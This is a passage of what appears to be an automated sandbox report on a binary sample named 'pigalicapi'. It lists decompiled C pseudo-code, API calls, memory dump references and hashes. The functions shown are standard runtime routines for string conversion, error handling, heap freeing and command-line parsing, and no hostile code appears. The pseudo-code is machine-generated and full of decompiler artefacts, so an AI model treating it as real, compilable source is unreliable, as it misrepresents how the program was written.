                                                                                                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                                                                                                    				E00EFE270();
                                                                                                                                                                                                                                                    				_t69 = _t71;
                                                                                                                                                                                                                                                    				if(_t69 == 0) {
                                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				 *_t69 = 0xcccc;
                                                                                                                                                                                                                                                    				goto L9;
                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                    0x00efa505
                                                                                                                                                                                                                                                    0x00efa50c
                                                                                                                                                                                                                                                    0x00efa518
                                                                                                                                                                                                                                                    0x00efa51d
                                                                                                                                                                                                                                                    0x00efa522
                                                                                                                                                                                                                                                    0x00efa527
                                                                                                                                                                                                                                                    0x00efa52a
                                                                                                                                                                                                                                                    0x00efa52c
                                                                                                                                                                                                                                                    0x00efa52c
                                                                                                                                                                                                                                                    0x00efa531
                                                                                                                                                                                                                                                    0x00efa54a
                                                                                                                                                                                                                                                    0x00efa550
                                                                                                                                                                                                                                                    0x00efa555
                                                                                                                                                                                                                                                    0x00efa5f4
                                                                                                                                                                                                                                                    0x00efa5f8
                                                                                                                                                                                                                                                    0x00efa5fd
                                                                                                                                                                                                                                                    0x00efa5fd
                                                                                                                                                                                                                                                    0x00efa619
                                                                                                                                                                                                                                                    0x00efa619
                                                                                                                                                                                                                                                    0x00efa55b
                                                                                                                                                                                                                                                    0x00efa563
                                                                                                                                                                                                                                                    0x00efa567
                                                                                                                                                                                                                                                    0x00efa5b3
                                                                                                                                                                                                                                                    0x00efa5b5
                                                                                                                                                                                                                                                    0x00efa5b7
                                                                                                                                                                                                                                                    0x00efa5bc
                                                                                                                                                                                                                                                    0x00efa5d3
                                                                                                                                                                                                                                                    0x00efa5db
                                                                                                                                                                                                                                                    0x00efa5eb
                                                                                                                                                                                                                                                    0x00efa5eb
                                                                                                                                                                                                                                                    0x00efa5db
                                                                                                                                                                                                                                                    0x00efa5ed
                                                                                                                                                                                                                                                    0x00efa5ee
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa5f3
                                                                                                                                                                                                                                                    0x00efa56e
                                                                                                                                                                                                                                                    0x00efa570
                                                                                                                                                                                                                                                    0x00efa572
                                                                                                                                                                                                                                                    0x00efa57a
                                                                                                                                                                                                                                                    0x00efa597
                                                                                                                                                                                                                                                    0x00efa5a1
                                                                                                                                                                                                                                                    0x00efa5a6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa5a8
                                                                                                                                                                                                                                                    0x00efa5ae
                                                                                                                                                                                                                                                    0x00efa5ae
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa5ae
                                                                                                                                                                                                                                                    0x00efa57e
                                                                                                                                                                                                                                                    0x00efa582
                                                                                                                                                                                                                                                    0x00efa587
                                                                                                                                                                                                                                                    0x00efa58b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa58d
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?), ref: 00EFA54A
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00EFA582
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EFA5D3
                                                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00EFA5E5
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00EFA5EE
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBD19: RtlAllocateHeap.NTDLL(00000000,?,?,?,00EFA5A1,00000000), ref: 00EFBD4B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 313313983-0
                                                                                                                                                                                                                                                    • Opcode ID: da5127272e56589352ec62435d74174de06783e2fdcbce07b9bbfbbddf6d6481
                                                                                                                                                                                                                                                    • Instruction ID: c5867af122828af2c64bbf9377e93293226abd3a4d4b8c63f4f2acf15919afa3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da5127272e56589352ec62435d74174de06783e2fdcbce07b9bbfbbddf6d6481
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1131BFB2A0021EABDF259F64DC41EBE7BA5EB40314B084168FD18EB251E735CD50CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                    			E00EF9CB4(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				intOrPtr _t2;
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                                    				long _t17;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t11 = __ecx;
                                                                                                                                                                                                                                                    				_t17 = GetLastError();
                                                                                                                                                                                                                                                    				_t10 = 0;
                                                                                                                                                                                                                                                    				_t2 =  *0xf8d70c; // 0x2
                                                                                                                                                                                                                                                    				_t20 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                    				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                    					_t16 = E00EFA67D(_t11, 1, 0x364);
                                                                                                                                                                                                                                                    					_pop(_t13);
                                                                                                                                                                                                                                                    					if(_t16 != 0) {
                                                                                                                                                                                                                                                    						_t4 = E00EFA92D(_t13, _t17, __eflags,  *0xf8d70c, _t16);
                                                                                                                                                                                                                                                    						__eflags = _t4;
                                                                                                                                                                                                                                                    						if(_t4 != 0) {
                                                                                                                                                                                                                                                    							E00EF9AA2(_t13, _t16, 0xf8df44);
                                                                                                                                                                                                                                                    							E00EFA6DA(_t10);
                                                                                                                                                                                                                                                    							__eflags = _t16;
                                                                                                                                                                                                                                                    							if(_t16 != 0) {
                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_push(_t16);
                                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_push(_t10);
                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                    						E00EFA6DA();
                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                    						SetLastError(_t17);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t16 = E00EFA8D7(_t11, _t17, _t20, _t2);
                                                                                                                                                                                                                                                    					if(_t16 != 0) {
                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                    						SetLastError(_t17);
                                                                                                                                                                                                                                                    						_t10 = _t16;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t10;
                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                    0x00ef9cb4
                                                                                                                                                                                                                                                    0x00ef9cbf
                                                                                                                                                                                                                                                    0x00ef9cc1
                                                                                                                                                                                                                                                    0x00ef9cc3
                                                                                                                                                                                                                                                    0x00ef9cc8
                                                                                                                                                                                                                                                    0x00ef9ccb
                                                                                                                                                                                                                                                    0x00ef9cd9
                                                                                                                                                                                                                                                    0x00ef9ce5
                                                                                                                                                                                                                                                    0x00ef9ce8
                                                                                                                                                                                                                                                    0x00ef9ceb
                                                                                                                                                                                                                                                    0x00ef9cfd
                                                                                                                                                                                                                                                    0x00ef9d02
                                                                                                                                                                                                                                                    0x00ef9d04
                                                                                                                                                                                                                                                    0x00ef9d0f
                                                                                                                                                                                                                                                    0x00ef9d15
                                                                                                                                                                                                                                                    0x00ef9d1d
                                                                                                                                                                                                                                                    0x00ef9d1f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ef9d06
                                                                                                                                                                                                                                                    0x00ef9d06
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ef9d06
                                                                                                                                                                                                                                                    0x00ef9ced
                                                                                                                                                                                                                                                    0x00ef9ced
                                                                                                                                                                                                                                                    0x00ef9cee
                                                                                                                                                                                                                                                    0x00ef9cee
                                                                                                                                                                                                                                                    0x00ef9d21
                                                                                                                                                                                                                                                    0x00ef9d22
                                                                                                                                                                                                                                                    0x00ef9d22
                                                                                                                                                                                                                                                    0x00ef9ccd
                                                                                                                                                                                                                                                    0x00ef9cd3
                                                                                                                                                                                                                                                    0x00ef9cd7
                                                                                                                                                                                                                                                    0x00ef9d2a
                                                                                                                                                                                                                                                    0x00ef9d2b
                                                                                                                                                                                                                                                    0x00ef9d31
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ef9cd7
                                                                                                                                                                                                                                                    0x00ef9d38

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00EF982B,00EFA6CF,?,00EF9C5E,00000001,00000364,?,00EF4B88,?), ref: 00EF9CB9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9CEE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9D15
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 00EF9D22
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 00EF9D2B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                    • Opcode ID: ddfda3d318e82465ed37e07e4eebf3d46d28b234d10ff0d63c7099a4ca42f9e0
                                                                                                                                                                                                                                                    • Instruction ID: 743c3dd76e4ae65bdbef5ab11b59b76a2338546df72d732b98fb3c907524edaa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddfda3d318e82465ed37e07e4eebf3d46d28b234d10ff0d63c7099a4ca42f9e0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C01D67620470C67C71226346D45A7A329DEFD13B973A2124FB5AF6193FFA18C016121
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EFBB90(intOrPtr* _a4) {
                                                                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t21 = _a4;
                                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                                    					_t23 =  *_t21 -  *0xf8dd10; // 0xf8dd08
                                                                                                                                                                                                                                                    					if(_t23 != 0) {
                                                                                                                                                                                                                                                    						E00EFA6DA(_t7);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xf8dd14; // 0xf8e181
                                                                                                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                                                                                                    						E00EFA6DA(_t8);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xf8dd18; // 0xf8e181
                                                                                                                                                                                                                                                    					if(_t25 != 0) {
                                                                                                                                                                                                                                                    						E00EFA6DA(_t9);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xf8dd40; // 0xf8dd0c
                                                                                                                                                                                                                                                    					if(_t26 != 0) {
                                                                                                                                                                                                                                                    						E00EFA6DA(_t10);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                                                                                                                                                                    					_t27 = _t6 -  *0xf8dd44; // 0xf8e184
                                                                                                                                                                                                                                                    					if(_t27 != 0) {
                                                                                                                                                                                                                                                    						return E00EFA6DA(_t6);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t6;
                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                    0x00efbb96
                                                                                                                                                                                                                                                    0x00efbb9b
                                                                                                                                                                                                                                                    0x00efbb9f
                                                                                                                                                                                                                                                    0x00efbba5
                                                                                                                                                                                                                                                    0x00efbba8
                                                                                                                                                                                                                                                    0x00efbbad
                                                                                                                                                                                                                                                    0x00efbbb1
                                                                                                                                                                                                                                                    0x00efbbb7
                                                                                                                                                                                                                                                    0x00efbbba
                                                                                                                                                                                                                                                    0x00efbbbf
                                                                                                                                                                                                                                                    0x00efbbc3
                                                                                                                                                                                                                                                    0x00efbbc9
                                                                                                                                                                                                                                                    0x00efbbcc
                                                                                                                                                                                                                                                    0x00efbbd1
                                                                                                                                                                                                                                                    0x00efbbd5
                                                                                                                                                                                                                                                    0x00efbbdb
                                                                                                                                                                                                                                                    0x00efbbde
                                                                                                                                                                                                                                                    0x00efbbe3
                                                                                                                                                                                                                                                    0x00efbbe4
                                                                                                                                                                                                                                                    0x00efbbe7
                                                                                                                                                                                                                                                    0x00efbbed
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efbbf5
                                                                                                                                                                                                                                                    0x00efbbed
                                                                                                                                                                                                                                                    0x00efbbf8

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBBA8
                                                                                                                                                                                                                                                      • Part of subcall function 00EFA6DA: HeapFree.KERNEL32(00000000,00000000,?,00EFBC27,?,00000000,?,00000000,?,00EFBC4E,?,00000007,?,?,00EFADC4,?), ref: 00EFA6F0
                                                                                                                                                                                                                                                      • Part of subcall function 00EFA6DA: GetLastError.KERNEL32(?,?,00EFBC27,?,00000000,?,00000000,?,00EFBC4E,?,00000007,?,?,00EFADC4,?,?), ref: 00EFA702
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBBBA
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBBCC
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBBDE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBBF0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: b65910a4bee763ec83c3929f7bc75cd142a960bef7c88a6b7cf4404cc0029d84
                                                                                                                                                                                                                                                    • Instruction ID: 341726da726927beba1f7c0c6f7cb7f305e5b5cf2ef6d8b6bbe0d0175a58442f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b65910a4bee763ec83c3929f7bc75cd142a960bef7c88a6b7cf4404cc0029d84
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0497351820CAB8620EF58EA82C7A73DDBF003943692805F60DFB941CB20FC809A68
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                    			E00F0160F(signed int __ecx) {
                                                                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                    				if((__ecx | 0xffffffff) == 0) {
                                                                                                                                                                                                                                                    					_t7 =  *0xf8dd00; // 0x1662758
                                                                                                                                                                                                                                                    					if(_t7 != 0xf8dae0) {
                                                                                                                                                                                                                                                    						E00EFA6DA(_t7);
                                                                                                                                                                                                                                                    						 *0xf8dd00 = 0xf8dae0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E00EFA6DA( *0xf8ea34);
                                                                                                                                                                                                                                                    				 *0xf8ea34 = 0;
                                                                                                                                                                                                                                                    				E00EFA6DA( *0xf8ea38);
                                                                                                                                                                                                                                                    				 *0xf8ea38 = 0;
                                                                                                                                                                                                                                                    				E00EFA6DA( *0xf8e818);
                                                                                                                                                                                                                                                    				 *0xf8e818 = 0;
                                                                                                                                                                                                                                                    				E00EFA6DA( *0xf8e81c);
                                                                                                                                                                                                                                                    				 *0xf8e81c = 0;
                                                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                    0x00f01618
                                                                                                                                                                                                                                                    0x00f0161c
                                                                                                                                                                                                                                                    0x00f0161e
                                                                                                                                                                                                                                                    0x00f0162a
                                                                                                                                                                                                                                                    0x00f0162d
                                                                                                                                                                                                                                                    0x00f01633
                                                                                                                                                                                                                                                    0x00f01633
                                                                                                                                                                                                                                                    0x00f0162a
                                                                                                                                                                                                                                                    0x00f0163f
                                                                                                                                                                                                                                                    0x00f0164c
                                                                                                                                                                                                                                                    0x00f01652
                                                                                                                                                                                                                                                    0x00f0165d
                                                                                                                                                                                                                                                    0x00f01663
                                                                                                                                                                                                                                                    0x00f0166e
                                                                                                                                                                                                                                                    0x00f01674
                                                                                                                                                                                                                                                    0x00f0167c
                                                                                                                                                                                                                                                    0x00f01685

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F0162D
                                                                                                                                                                                                                                                      • Part of subcall function 00EFA6DA: HeapFree.KERNEL32(00000000,00000000,?,00EFBC27,?,00000000,?,00000000,?,00EFBC4E,?,00000007,?,?,00EFADC4,?), ref: 00EFA6F0
                                                                                                                                                                                                                                                      • Part of subcall function 00EFA6DA: GetLastError.KERNEL32(?,?,00EFBC27,?,00000000,?,00000000,?,00EFBC4E,?,00000007,?,?,00EFADC4,?,?), ref: 00EFA702
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F0163F
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F01652
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F01663
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F01674
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 6ba73ea289487e863000f34b74300d981545b20dde193c504260ed5640f34275
                                                                                                                                                                                                                                                    • Instruction ID: 77deb841f9610d836894acc9c5aabf15e3255673bf58c0d3f599d702a9b41391
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ba73ea289487e863000f34b74300d981545b20dde193c504260ed5640f34275
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39F05EB181412CABDA096F14BD428B83BA4FB24BA030E5126F409AA6B1C7350941FFCA
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                                    			E00F00FD5(intOrPtr _a4) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t42;
                                                                                                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                                                                    				WCHAR* _t48;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t49;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t53;
                                                                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t61;
                                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if(_a4 == 2 || _a4 == 1) {
                                                                                                                                                                                                                                                    					GetModuleFileNameW(0, 0xf8e5f0, 0x104);
                                                                                                                                                                                                                                                    					_t48 =  *0xf8e824; // 0x1651c30
                                                                                                                                                                                                                                                    					 *0xf8e828 = 0xf8e5f0;
                                                                                                                                                                                                                                                    					if(_t48 == 0 ||  *_t48 == 0) {
                                                                                                                                                                                                                                                    						_t48 = 0xf8e5f0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                    					E00F010F4(_t48, 0, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                                    					_t61 = E00F0127A(_v8, _v16, 2);
                                                                                                                                                                                                                                                    					if(_t61 != 0) {
                                                                                                                                                                                                                                                    						E00F010F4(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                                                                                                                                                                                                                                                    						if(_a4 != 1) {
                                                                                                                                                                                                                                                    							_v12 = 0;
                                                                                                                                                                                                                                                    							_push( &_v12);
                                                                                                                                                                                                                                                    							_t49 = E00F01CBE(_t48, 0, _t61, _t61);
                                                                                                                                                                                                                                                    							if(_t49 == 0) {
                                                                                                                                                                                                                                                    								_t56 = _v12;
                                                                                                                                                                                                                                                    								_t53 = 0;
                                                                                                                                                                                                                                                    								_t35 = _t56;
                                                                                                                                                                                                                                                    								if( *_t56 == 0) {
                                                                                                                                                                                                                                                    									L15:
                                                                                                                                                                                                                                                    									_t36 = 0;
                                                                                                                                                                                                                                                    									 *0xf8e814 = _t53;
                                                                                                                                                                                                                                                    									_v12 = 0;
                                                                                                                                                                                                                                                    									_t49 = 0;
                                                                                                                                                                                                                                                    									 *0xf8e81c = _t56;
                                                                                                                                                                                                                                                    									L16:
                                                                                                                                                                                                                                                    									E00EFA6DA(_t36);
                                                                                                                                                                                                                                                    									_v12 = 0;
                                                                                                                                                                                                                                                    									goto L17;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                    									L14:
                                                                                                                                                                                                                                                    									_t35 = _t35 + 4;
                                                                                                                                                                                                                                                    									_t53 =  &(_t53->i);
                                                                                                                                                                                                                                                    								} while ( *_t35 != 0);
                                                                                                                                                                                                                                                    								goto L15;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t36 = _v12;
                                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *0xf8e814 = _v8 - 1;
                                                                                                                                                                                                                                                    						_t42 = _t61;
                                                                                                                                                                                                                                                    						_t61 = 0;
                                                                                                                                                                                                                                                    						 *0xf8e81c = _t42;
                                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t43 = E00EF9826();
                                                                                                                                                                                                                                                    						_push(0xc);
                                                                                                                                                                                                                                                    						_pop(0);
                                                                                                                                                                                                                                                    						 *_t43 = 0;
                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                    						_t49 = 0;
                                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                                    						E00EFA6DA(_t61);
                                                                                                                                                                                                                                                    						return _t49;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t44 = E00EF9826();
                                                                                                                                                                                                                                                    					_t62 = 0x16;
                                                                                                                                                                                                                                                    					 *_t44 = _t62;
                                                                                                                                                                                                                                                    					E00EF976A();
                                                                                                                                                                                                                                                    					return _t62;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                    0x00f00fe2
                                                                                                                                                                                                                                                    0x00f01010
                                                                                                                                                                                                                                                    0x00f01016
                                                                                                                                                                                                                                                    0x00f0101c
                                                                                                                                                                                                                                                    0x00f01024
                                                                                                                                                                                                                                                    0x00f0102b
